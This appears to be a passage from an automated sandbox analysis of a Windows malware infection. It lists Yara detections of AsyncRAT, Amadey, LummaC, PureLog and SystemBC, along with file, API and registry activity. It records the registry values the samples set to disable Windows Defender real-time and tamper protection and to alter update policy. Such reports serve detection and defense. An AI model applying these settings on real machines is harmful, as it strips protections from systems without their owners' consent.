Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Queries volume information: C:\ProgramData\jhbbvnx\fbpbh.exe VolumeInformation
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F6D21C GetLocalTime,

8_2_00F6D21C

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F6D27A GetUserNameW,

8_2_00F6D27A

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F4BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

8_2_00F4BB6F

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00F142DE

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DhqvS8pXj8.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.483d2fa8a0d53818306efeb32d3.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1741190427.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1715028121.00000000002C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2980025036.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2475582578.0000000000511000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: 63.2.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.9ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.9ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.9ff0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.9ff0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927194723.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927194723.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2863781739.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.0.1e8dfbd5c2.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004C.00000000.2507798493.0000000000992000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe, type: DROPPED

Yara detected SystemBC

Source: Yara match	File source: 7.2.k6Sly2p.exe.2a214e4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.fbpbh.exe.33c0690.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.fbpbh.exe.33c0690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.k6Sly2p.exe.2a214e4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: afccf6841f.exe	Binary or memory string: WIN_81
Source: afccf6841f.exe	Binary or memory string: WIN_XP
Source: afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: afccf6841f.exe	Binary or memory string: WIN_XPe
Source: afccf6841f.exe	Binary or memory string: WIN_VISTA
Source: afccf6841f.exe	Binary or memory string: WIN_7
Source: afccf6841f.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected LummaC Stealer

